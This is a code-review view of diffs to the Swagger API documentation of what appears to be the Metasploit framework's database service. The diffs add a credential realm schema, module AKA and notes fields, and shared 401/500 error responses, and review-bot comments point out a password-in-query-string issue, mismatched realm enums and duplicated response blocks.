TOKEN_EXAMPLE = '899d2f45e12429d07427230289400a4594bcffe32169ebb826b4ffa9b90e1d1586f15fa42f069bb7'
|
||||
|
||||
# Swagger documentation for auth model
|
||||
swagger_schema :Auth do
|
||||
property :message, type: :string, description: MESSAGE_DESC, example: MESSAGE_EXAMPLE
|
||||
property :token, type: :string, description: TOKEN_DESC, example: TOKEN_EXAMPLE
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/auth/generate-token' do
|
||||
# Swagger documentation for /api/v1/auth/generate-token GET
|
||||
operation :get do
|
||||
|
||||
key :description, 'Return a valid Authorization Bearer token.'
|
||||
key :tags, [ 'auth' ]
|
||||
|
||||
parameter do
|
||||
key :name, :username
|
||||
key :in, :query
|
||||
key :description, 'The username for the user you want to authenticate.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :password
|
||||
key :in, :query
|
||||
key :description, 'The password for the user you want to authenticate.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns a valid auth token.'
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Auth
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, 'Invalid username or password. ' + RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
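Review bot: The documented `GET /api/v1/auth/generate-token` takes `username` and `password` as `in: :query` parameters, so the password is carried in the URL, where web-server and proxy access logs, browser history and Referer headers retain it. The endpoint itself lives in the controller, but this schema is what clients build against, so it is the place to raise it: document the operation as a POST with the credentials in the request body, or at minimum state in `key :description` that the credentials are sent in the query string so operators know to keep the logs accordingly. The 401 description string-concatenates `'Invalid username or password. '` with `RootApiDoc::DEFAULT_RESPONSE_401`; interpolation, `"Invalid username or password. #{RootApiDoc::DEFAULT_RESPONSE_401}"`, is the idiomatic form.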
@ -33,6 +33,11 @@ module CredentialApiDoc
|
|||
DATA_EXAMPLE = "'password123', '$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1', or '$NT$7f8fe03093cc84b267b109625f6bbf4b'"
|
||||
JTR_FORMAT_DESC = 'Comma-separated list of the formats for John the ripper to use to try and crack this.'
|
||||
JTR_FORMAT_EXAMPLE = 'md5,des,bsdi,crypt'
|
||||
KEY_DESC = 'The name of the key for the realm.'
|
||||
KEY_EXAMPLE = 'Active Directory Domain'
|
||||
VALUE_DESC = 'The value of the key for the realm.'
|
||||
VALUE_EXAMPLE = 'contoso.com'
|
||||
|
||||
PUBLIC_TYPE_ENUM = [ 'Metasploit::Credential::BlankUsername', 'Metasploit::Credential::Username' ]
|
||||
PRIVATE_TYPE_CLASS_ENUM = [
|
||||
'Metasploit::Credential::ReplayableHash',
|
||||
|
@ -108,6 +113,15 @@ module CredentialApiDoc
|
|||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_schema :Realm do
|
||||
key :required, [:key, :value]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE
|
||||
property :value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE
|
||||
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/credentials' do
|
||||
# Swagger documentation for /api/v1/credentials GET
|
||||
operation :get do
|
||||
|
@ -167,8 +181,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -190,6 +211,8 @@ module CredentialApiDoc
|
|||
property :username, type: :string, description: USERNAME_DESC, example: USERNAME_EXAMPLE
|
||||
property :private_data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :private_type, type: :string, description: PRIVATE_TYPE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_key, type: :string, description: KEY_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_value, type: :string, description: VALUE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :jtr_format, type: :string, description: JTR_FORMAT_DESC, example: JTR_FORMAT_EXAMPLE
|
||||
property :address, type: :string, format: :ipv4, required: true, description: ADDRESS_DESC, example: ADDRESS_EXAMPLE
|
||||
property :port, type: :int32, format: :int32, description: PORT_DESC, example: PORT_EXAMPLE
|
||||
|
@ -204,7 +227,7 @@ module CredentialApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Credential
|
||||
|
@ -212,8 +235,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -237,8 +267,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -274,8 +311,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -300,7 +344,7 @@ module CredentialApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Credential
|
||||
|
@ -308,8 +352,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
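Review bot: `property :realm_key ... enum: PRIVATE_TYPE_ENUM` and `property :realm_value ... enum: PRIVATE_TYPE_ENUM` restrict the realm key and value to the credential-class names in `PRIVATE_TYPE_ENUM`, which contradicts their own `KEY_DESC`/`VALUE_DESC` and the `'Active Directory Domain'`/`'contoso.com'` examples defined at the top of the module; they should read `property :realm_key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE` and `property :realm_value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE`. The new `Realm` schema defines the same two fields, so whichever shape the request really accepts, the request body and `Realm` should agree — this view does not show what references `:Realm`. The enclosing `swagger_path` blocks start and end outside the hunks.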
@ -36,8 +36,15 @@ module DbExportApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
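Review bot: The `response 401` / `response 500` pair added here is the same eight lines pasted into every operation across this file and the Event, Exploit, Host, Login, Loot, ModuleSearch and Msf doc modules below, so the next wording change means editing dozens of sites again; if the swagger-blocks DSL allows it, a shared helper in `RootApiDoc` that each operation block calls would keep them in step, and failing that a `# Keep in sync with the common 401/500 responses in RootApiDoc` comment at one canonical site would at least point the next editor there. The switch of `key :description` to `RootApiDoc::DEFAULT_RESPONSE_500` is itself the right direction. The enclosing operation blocks start outside the hunk.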
@ -48,7 +48,7 @@ module EventApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Event
|
||||
|
@ -56,12 +56,19 @@ module EventApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -56,7 +56,7 @@ module ExploitApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Exploit
|
||||
|
@ -64,8 +64,15 @@ module ExploitApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
@ -113,8 +113,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -160,7 +167,7 @@ module HostApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Host
|
||||
|
@ -168,8 +175,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -195,8 +209,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -228,8 +249,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -262,12 +290,19 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -61,8 +61,15 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -93,7 +100,7 @@ module LoginApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Login
|
||||
|
@ -101,8 +108,15 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -127,6 +141,14 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -154,8 +176,15 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -180,7 +209,7 @@ module LoginApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Login
|
||||
|
@ -188,12 +217,19 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
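Review bot: The hunk at `@ -127,6 +141,14 @@` adds a `response 401` block with no matching `response 500`, while every other operation in this file and the sibling doc modules gets both; if this operation can return 500, add the same `response 500 do key :description, RootApiDoc::DEFAULT_RESPONSE_500 ... end` block next to it, and if it deliberately cannot, a one-line comment saying so would stop the next reader from treating it as an omission. The `end`s preceding the new block close scopes opened outside the hunk, so the nesting cannot be confirmed from this view.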
@ -57,8 +57,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -89,7 +96,7 @@ module LootApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Loot
|
||||
|
@ -97,8 +104,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -124,8 +138,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -157,8 +178,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -183,7 +211,7 @@ module LootApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Loot
|
||||
|
@ -191,12 +219,19 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,6 +3,7 @@ require 'swagger/blocks'
|
|||
module ModuleSearchApiDoc
|
||||
include Swagger::Blocks
|
||||
|
||||
AKA_DESC = 'Filter modules with a matching AKA name.'
|
||||
APP_DESC = 'Filter modules that are client or server attacks. (Accepts strings \'client\' or \'server\').'
|
||||
ARCH_DESC = 'Filter modules with a matching architecture.'
|
||||
AUTHOR_DESC = 'Filter modules written by a matching author.'
|
||||
|
@ -33,7 +34,8 @@ module ModuleSearchApiDoc
|
|||
TARGETS_DESC = 'Alias for \'target\'.'
|
||||
TEXT_DESC = 'Filter modules matching any one of name, full name, description, reference, author, or targets.'
|
||||
TYPE_DESC = 'Filter modules with a matching type (exploit, auxiliary, payload, etc.).'
|
||||
FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_client\', \'is_server\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
|
||||
FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_client\', \'is_server\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
|
||||
NOTES_DESC = 'Extra info for a module, such as AKA names or NOCVE explanations.'
|
||||
|
||||
TYPE_ENUM = [
|
||||
'auxiliary',
|
||||
|
@ -59,7 +61,6 @@ module ModuleSearchApiDoc
|
|||
'thelightcosine'
|
||||
]
|
||||
REFERENCES_EXAMPLE = [
|
||||
'AKA-ETERNALBLUE',
|
||||
'MSB-MS17-010',
|
||||
'CVE-2017-0143',
|
||||
'CVE-2017-0144',
|
||||
|
@ -81,6 +82,9 @@ module ModuleSearchApiDoc
|
|||
TARGETS_EXAMPLE = [
|
||||
'Windows 7 and Server 2008 R2 (x64) All Service Packs'
|
||||
]
|
||||
NOTES_EXAMPLE = {
|
||||
'AKA' => [ 'ETERNALBLUE' ]
|
||||
}
|
||||
|
||||
|
||||
# Swagger documentation for Module Search model
|
||||
|
@ -103,6 +107,7 @@ module ModuleSearchApiDoc
|
|||
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
|
||||
property :is_install_path, type: :boolean, description: IS_INSTALL_PATH_DESC, example: IS_INSTALL_PATH_EXAMPLE
|
||||
property :targets, description: TARGET_DESC, example: TARGETS_EXAMPLE, type: :array do items type: :string end
|
||||
property :notes, description: NOTES_DESC, example: NOTES_EXAMPLE, type: :hash do items type: :hash end
|
||||
end
|
||||
|
||||
|
||||
|
@ -114,6 +119,7 @@ module ModuleSearchApiDoc
|
|||
key :tags, [ 'module' ]
|
||||
|
||||
parameters = {
|
||||
:aka => AKA_DESC,
|
||||
:app => APP_DESC,
|
||||
:arch => ARCH_DESC,
|
||||
:author => AUTHOR_DESC,
|
||||
|
@ -167,8 +173,15 @@ module ModuleSearchApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
@ -18,8 +18,15 @@ module MsfApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
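Review bot: The `response 401 do … key :'$ref', :AuthErrorModel … end` block added here is byte-identical to the one added in the ModuleSearchApiDoc hunk at `@ -167,8 +173,15 @@`, and the reworked `response 500` block follows the same shape, so only the description strings were centralized while the blocks themselves are still copied per operation. Since the auth-failure response is what every endpoint must document consistently, consider defining the 401 (and 500) response once in `RootApiDoc` as a helper that is invoked from each operation, so that a later change to the error schema cannot drift between endpoints. The enclosing operation block that these `response` calls belong to starts outside the hunk, so whether it already has other error responses (for example for invalid input) cannot be checked from here.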